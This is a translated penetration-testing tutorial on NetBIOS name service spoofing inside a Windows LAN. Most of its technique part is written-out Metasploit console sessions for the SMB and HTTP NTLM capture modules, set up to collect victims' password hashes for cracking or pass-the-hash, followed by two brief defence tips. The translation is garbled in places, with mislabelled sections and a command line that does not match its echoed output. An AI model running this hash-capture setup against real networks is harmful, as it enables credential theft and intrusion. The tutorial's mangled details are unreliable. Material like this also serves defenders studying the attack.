Use NetBios Spoofing technology to penetrate the Intranet

Preface
We know that during Intranet penetration, ARP spoofing, DNS spoofing, and other methods often have a great impact. In addition, due to the old technology, there are many defense software, in addition, many network devices gradually have the ARP spoofing defense function, which makes it difficult for our Intranet penetration.
Recently, I used NetBios Spoofing technology in penetration testing. This technology is effective for the Windows XP, 2003, Vista, 7, and 2008 series, it can capture system Hash at a low cost without relying on ARP Spoofing.
NetBIOS Name Service (NBNS) Description
The NETBIOS protocol is an application programming interface (API) that can be used by a program on the LAN. It provides a unified command set for the program to request low-level services, the function is to provide networks and other special functions for the lan. The system can use WINS service, broadcast, Lmhost file, and other modes to resolve NetBIOS names to corresponding IP addresses for information communication, therefore, the NetBIOS protocol can be used within the LAN to facilitate message communication and resource sharing.
For Windows DNS resolution, follow these steps:
1. local hosts file-C: \ Windows \ System32 \ drivers \ etc \ hosts
2. DNS
3. NBNS
When a visitor enters a domain name that does not exist, and the local host file and DNS server cannot provide resolution, we send an NBNS request for query in a cute and user-friendly Windows system.
 
Please take a closer look at the packet capture and you will find that the most powerful is: NBNS requests it is a broadcast package!
That is, anyone can reply to and redirect traffic without relying on ARP spoofing. This is amazing...

Now we have a clear idea: our purpose is to reply to the NBNS Response, so as to transfer traffic for spoofing.
Method 3
Currently, NetBios Spoofing can be used in two ways: HTTP and SMB.
Open Metasploit, use the nbns_response module, and set the spoofing IP Address:
 
SMB:
Msf> use auxiliary/server/capture/smb
Msf auxiliary (smb)> set JOHNPWFILE/home/tm/johnsmb
JOHNPWFILE =>/home/tm/johnsmb
Msf auxiliary (smb)> show options

Module options (auxiliary/server/capture/smb ):

Name Current Setting Required Description
--------------------------------------
CAINPWFILE no The local filename to store the hashes in Cain & Abel format
CHALLENGE 1122334455667788 yes The 8 byte challenge
JOHNPWFILE/home/tm/johnsmb no The prefix to the local filename to store the hashes in JOHN format
LOGFILE no The local filename to store the captured hashes
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 445 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that shoshould be used (accepted: SSL2, SSL3, TLS1)

Msf auxiliary (smb)> run www.2cto.com
[*] Auxiliary module execution completed

[*] Server started.
HTTP:
Msf auxiliary (smb)> use auxiliary/server/capture/http_ntlm
Msf auxiliary (http_ntlm)> set LOGFILE/home/tm/httplog
LOGFILE =>/home/tm/johnhttp
Msf auxiliary (http_ntlm)> set URIPATH/
URIPATH =>/
Msf auxiliary (http_ntlm)> set SRVPORT 80
SRVPORT => 80
Scenario 3
1. In the same exchange environment, there is a WINDOWS host access does not exist domain name, such as: http://thanks1132124324.com
 
2. In the same exchange environment, a WINDOWS Host performs SMB communication that does not exist, for example, \ thanks1132124324.
 
For example, we can obtain the HASH of the attacker through the above two methods (the test machine uses WIN7 ).
After obtaining the HASH, further penetration methods such as cracking and HASH transfer will not be described here. It is worth noting that the HASH Storage Mechanism (NTLMv2) of WINDOWS systems in higher versions makes it more difficult to crack.
IV Defense methods
1. Use a high-intensity password for a WINDOWS system to increase the difficulty of HASH cracking
2. Disable the TCP/IP Netbios Function

Author: Thanks Site: http://www.freebuf.com